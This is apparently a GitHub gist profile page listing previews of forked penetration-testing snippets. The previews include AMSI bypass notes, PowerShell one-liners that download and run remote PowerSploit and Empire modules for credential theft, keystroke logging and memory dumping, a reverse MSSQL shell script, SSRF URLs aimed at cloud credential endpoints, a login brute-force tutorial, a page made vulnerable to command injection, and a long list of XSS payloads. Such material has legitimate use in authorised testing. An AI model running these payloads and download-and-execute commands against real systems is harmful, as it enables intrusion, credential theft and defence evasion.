Skip to content

Instantly share code, notes, and snippets.

View CalfCrusher's full-sized avatar
Pwning

Christopher CalfCrusher

Pwning
127 followers · 76 following
View GitHub Profile
@CalfCrusher
CalfCrusher / amsi-bypass.md
Created October 7, 2023 15:07 — forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

@CalfCrusher
CalfCrusher / In-memory PS injection.txt
Created May 30, 2023 17:53 — forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1');
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1')
#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1')
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
@CalfCrusher
CalfCrusher / mandros.py
Created May 19, 2023 15:03 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@CalfCrusher
CalfCrusher / cloud_metadata.txt
Created May 11, 2023 16:15 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@CalfCrusher
CalfCrusher / hash_examples.md
Created May 2, 2023 21:57 — forked from dwallraff/hash_examples.md
Hashcat hash types - https://hashcat.net/wiki/doku.php?id=example_hashes

Hashcat Example hashes

Unless otherwise noted, the password for all example hashes is hashcat

Hash-Mode Hash-Name Example
0 MD5 8743b52063cd84097a65d1633f5c74f5
10 md5($pass.$salt) 01dfae6e5d4d90d9892622325959afbe:7050461
@CalfCrusher
CalfCrusher / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Created March 9, 2023 09:49 — forked from intrd/tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
@CalfCrusher
CalfCrusher / kali-headless.md
Created January 27, 2023 22:32 — forked from xErik/kali-headless.md
Configuring Headless (no X, GUI) Kali, Running In VirtualBox

Kali Headless Mode Configuration

Disabling the GUI/X/Head

systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot
@CalfCrusher
CalfCrusher / ping.aspx
Created January 11, 2023 15:12 — forked from stasinopoulos/ping.aspx
Simple ASPX application (vulnerable to OS command injections)
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e){
}
string ExcuteCmd(string arg){
ProcessStartInfo psi = new ProcessStartInfo();
@CalfCrusher
CalfCrusher / gist:55e1505e027b48dc5de41e9f65a8069b
Created January 10, 2023 14:46 — forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@CalfCrusher
CalfCrusher / xss-image.svg
Created January 10, 2023 14:38 — forked from rudSarkar/xss-image.svg
SVG Image XSS File
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.